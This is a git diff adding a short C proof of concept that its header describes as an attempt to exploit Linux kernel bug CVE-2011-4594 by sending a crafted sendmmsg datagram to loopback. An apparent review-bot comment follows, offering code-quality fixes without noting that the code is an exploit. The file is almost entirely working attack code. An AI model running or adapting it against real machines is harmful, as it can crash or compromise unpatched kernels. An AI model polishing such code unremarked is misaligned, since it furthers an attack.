Diffstat (limited to 'splicket.c')
-rw-r--r--splicket.c78
1 files changed, 78 insertions, 0 deletions
diff --git a/splicket.c b/splicket.c
new file mode 100644
index 0000000..e939041
--- /dev/null
+++ b/splicket.c
@@ -0,0 +1,78 @@
+/*
+ * Socket Splickt
+ * by zx2c4
+ *
+ * This is an attempt to exploit CVE-2011-4594.
+ *
+ * It was patched in bc909d9ddbf7778371e36a651d6e4194b1cc7d4c.
+ *
+ */
+
+
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <signal.h>
+#include <netdb.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <sys/socket.h>
+#include <net/if.h>
+#include <net/ethernet.h>
+#include <linux/if_packet.h>
+#include <asm/unistd.h>
+#include <errno.h>
+
+#ifndef __NR_sendmmsg
+#if defined( __PPC__)
+#define __NR_sendmmsg 349
+#elif defined(__x86_64__)
+#define __NR_sendmmsg 307
+#elif defined(__i386__)
+#define __NR_sendmmsg 345
+#else
+#error __NR_sendmmsg not defined
+#endif
+#endif
+
+struct reimp_mmsghdr {
+ struct msghdr msg_hdr;
+ unsigned int msg_len;
+};
+static inline int reimp_sendmmsg(int fd, struct reimp_mmsghdr *mmsg, unsigned int vlen, unsigned int flags)
+{
+ return syscall(__NR_sendmmsg, fd, mmsg, vlen, flags, NULL);
+}
+
+int main(int argc, char *argv[])
+{
+ const int fd = socket(AF_INET, SOCK_DGRAM, 0);
+ char buf[10];
+ struct iovec iovec[1];
+ struct reimp_mmsghdr datagram;
+ struct sockaddr_in addr;
+
+ memset(buf, 0, sizeof(buf));
+ memset(iovec, 0, sizeof(iovec));
+ memset(&datagram, 0, sizeof(datagram));
+ memset(&addr, 0, sizeof(addr));
+ addr.sin_family = AF_INET;
+ addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+ addr.sin_port = htons(10000);
+ iovec[0].iov_base = buf;
+ iovec[0].iov_len = sizeof(buf);
+ datagram.msg_hdr.msg_iov = iovec;
+ datagram.msg_hdr.msg_iovlen = 1;
+ datagram.msg_hdr.msg_name = &addr;
+ datagram.msg_hdr.msg_namelen = sizeof(addr);
+
+ errno = 0;
+ if (reimp_sendmmsg(fd, &datagram, 1, 0) < 0) {
+ perror("reimp_sendmmsg");
+ exit(1);
+ }
+
+ return 0;
+} \ No newline at end of file
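Review bot: The return value of socket() on the `const int fd = socket(AF_INET, SOCK_DGRAM, 0);` line is never checked, so when socket() fails fd is -1 and the later sendmmsg call reports EBADF, which hides the actual cause; add `if (fd < 0) { perror("socket"); exit(1); }` immediately after the declaration block. The descriptor is also never released before `return 0;`, so a `close(fd);` there would keep the program tidy, and since argc and argv are unused the signature can be `int main(void)`. The trailing `NULL` passed to syscall() in reimp_sendmmsg appears unnecessary, as sendmmsg takes four arguments, though it is harmless. The file also relies on `<netdb.h>` indirectly providing `struct sockaddr_in`, `htonl` and `INADDR_LOOPBACK`; an explicit `#include <netinet/in.h>` and `#include <arpa/inet.h>` would make that dependency visible.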